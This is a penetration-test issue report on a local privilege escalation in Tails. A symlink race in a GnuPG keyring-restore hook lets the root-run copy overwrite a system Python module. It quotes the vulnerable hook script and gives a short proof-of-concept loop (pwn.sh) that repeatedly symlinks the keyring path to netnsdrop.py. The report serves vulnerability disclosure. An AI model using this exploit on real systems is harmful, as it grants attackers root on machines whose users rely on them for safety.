TPS - Local Privilege Escalation (LPE) via symlink race condition in GnuPG activation hook
https://git.radicallyopensecurity.com/ros/pen-tails/-/issues/5
Technical Description
/local/lib/persistent-storage/on-activated-hooks/GnuPG/maybe-restore-gnupg-pubring
#!/bin/sh
# refs: #17807
set -eu
KEYRING="/home/amnesia/.gnupg/pubring.kbx"
KEYRING_BAK="${KEYRING}~"
KEYRING_SIZE="$(stat -c %s ${KEYRING} || echo 0)"
if [ ! -f "${KEYRING}" ] || [ "${KEYRING_SIZE}" -le 32 ]; then
echo >&2 "warning: It seems the GnuPG keyring is corrupt"
if [ -f "${KEYRING_BAK}" ]; then
echo >&2 "warning: Restoring backup of GnuPG keyring"
cp "${KEYRING_BAK}" "${KEYRING}"
chmod u=rw,go= "${KEYRING}"
fi
fi
Impact
POC:
- Overwrite
pubring.kbx~
with attacker-controlled content. - run pwn.sh
- Activate / Deactivate several times the GnuPG Feature of the persistent Storage until the Race Condition Window is hit -> This can be automated via a socket auth script?
pwn.sh
#!/bin/bash
while :
do
rm -rf /home/amnesia/.gnupg/pubring.kbx;
ln -sf /usr/lib/python3/dist-packages/tailslib/netnsdrop.py /home/amnesia/.gnupg/pubring.kbx;
done